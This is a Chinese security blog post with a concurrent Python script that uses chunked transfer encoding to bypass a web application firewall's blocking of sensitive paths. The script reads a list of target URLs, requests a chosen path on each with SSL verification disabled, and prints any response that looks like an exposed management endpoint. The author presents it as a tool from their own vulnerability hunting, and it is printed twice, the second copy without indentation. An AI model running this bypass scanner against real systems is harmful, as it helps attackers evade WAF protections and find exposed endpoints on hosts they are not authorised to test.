关于某waf的路径拦截分块绕过脚本

前言：关于某waf的路径拦截绕过

之前挖掘漏洞的时候，遇到一种情况的就是对于指定敏感路径的拦截，但是这里是可以通过trunk分块传输绕过的，而当时存在资产中存在大量的情况，于是写了一个并发的脚本来进行挖掘探测，有时候需要用到但是总是找不到，就想着直接在博客上面进行保存了

 # coding=utf-8
# @Author   : zpchcbd HG team
# @Blog     : https://www.cnblogs.com/zpchcbd/
# @Time     : 2022-04-29 22:17
 
import asyncio
import aiohttp
import async_timeout
 
# gheaders = {'Transfer-encoding': 'chunked'}
gFilename = './url.txt'
gPyload = 'your_path'
 
 
def urlFormat(url):
    # iFlag = lambda x: x.endswith('/')
    if url.endswith('/'):
        # print('{}{}'.format(url, gPyload))
        return '{}{}'.format(url, gPyload)
    else:
        # print('{}/{}'.format(url, gPyload))
        return '{}/{}'.format(url, gPyload)
 
 
async def A(session, url):
    try:
        async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0',
                               allow_redirects=True) as response:
            text = await response.text()
            await asyncio.sleep(0.1)
            if '{"_links":{"self":{"href"' in text:
                print('-' * 30)
                print('[+] your_path, {}'.format(url))
                print('')
                print(text)
    except Exception as e:
        pass
        # print('[-] curl {} error, the error is {}'.format(url, str(e)))
 
 
async def T(url):
    try:
        # async with async_timeout.timeout(2):
        async with aiohttp.ClientSession() as session:
            async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0', allow_redirects=True) as response:
                retJson = await response.json()
                await asyncio.sleep(0.1)
                if '_links' in retJson.keys():
                    print('[+] your_path, {}'.format(url))
                    print('')
                    print(retJson)
                    print('-' * 30)
    except Exception as e:
        pass
        # print('[-] curl {} error, the error is {}'.format(url, str(e)))
 
 
async def C(url):
    async with aiohttp.ClientSession() as session:
        async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0', allow_redirects=True) as response:
            text = await response.text()
            await asyncio.sleep(2)
            print(text)
            print('-'*30)
 
 
async def B():
    taskList = []
    urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '')
                        for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
    async with aiohttp.ClientSession() as session: # timeout=len(urlList) * 2
        for _ in urlList:
            taskList.append(A(session, _))
        await asyncio.gather(*taskList)
 
 
async def H():
    taskList = []
    urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '') for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
    for _ in urlList:
        taskList.append(T(_))
    await asyncio.gather(*taskList)
 
 
if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    loop.run_until_complete(H())

posted @ 2022-10-17 15:36 zpchcbd 阅读(80) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· tomcat的路径url解码特性

· shuffledns / ksubdomain dns枚举源码学习及有效的泛解析爆破方法

· SQL注入

· 学习笔记-Bypass 技巧

· [协议安全]分块传输绕WAF的奥秘

历史上的今天：
2019-10-17 SUID提权
2019-10-17 内网中敏感文件的搜集
2019-10-17 内网探测协议出网

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)

关于某waf的路径拦截分块绕过脚本

我的标签

随笔档案

博客友链

	# coding=utf-8
	# @Author : zpchcbd HG team
	# @Blog : https://www.cnblogs.com/zpchcbd/
	# @Time : 2022-04-29 22:17

	import asyncio
	import aiohttp
	import async_timeout

	# gheaders = {'Transfer-encoding': 'chunked'}
	gFilename = './url.txt'
	gPyload = 'your_path'


	def urlFormat(url):
	# iFlag = lambda x: x.endswith('/')
	if url.endswith('/'):
	# print('{}{}'.format(url, gPyload))
	return '{}{}'.format(url, gPyload)
	else:
	# print('{}/{}'.format(url, gPyload))
	return '{}/{}'.format(url, gPyload)


	async def A(session, url):
	try:
	async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0',
	allow_redirects=True) as response:
	text = await response.text()
	await asyncio.sleep(0.1)
	if '{"_links":{"self":{"href"' in text:
	print('-' * 30)
	print('[+] your_path, {}'.format(url))
	print('')
	print(text)
	except Exception as e:
	pass
	# print('[-] curl {} error, the error is {}'.format(url, str(e)))


	async def T(url):
	try:
	# async with async_timeout.timeout(2):
	async with aiohttp.ClientSession() as session:
	async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0', allow_redirects=True) as response:
	retJson = await response.json()
	await asyncio.sleep(0.1)
	if '_links' in retJson.keys():
	print('[+] your_path, {}'.format(url))
	print('')
	print(retJson)
	print('-' * 30)
	except Exception as e:
	pass
	# print('[-] curl {} error, the error is {}'.format(url, str(e)))


	async def C(url):
	async with aiohttp.ClientSession() as session:
	async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0', allow_redirects=True) as response:
	text = await response.text()
	await asyncio.sleep(2)
	print(text)
	print('-'*30)


	async def B():
	taskList = []
	urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '')
	for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
	async with aiohttp.ClientSession() as session: # timeout=len(urlList) * 2
	for _ in urlList:
	taskList.append(A(session, _))
	await asyncio.gather(*taskList)


	async def H():
	taskList = []
	urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '') for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
	for _ in urlList:
	taskList.append(T(_))
	await asyncio.gather(*taskList)


	if __name__ == '__main__':
	loop = asyncio.get_event_loop()
	loop.run_until_complete(H())

记录部分个人学习和部分实战的笔记 我会慢慢补全部分空白的文章 :)

关于某waf的路径拦截分块绕过脚本

我的标签

随笔档案

博客友链

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)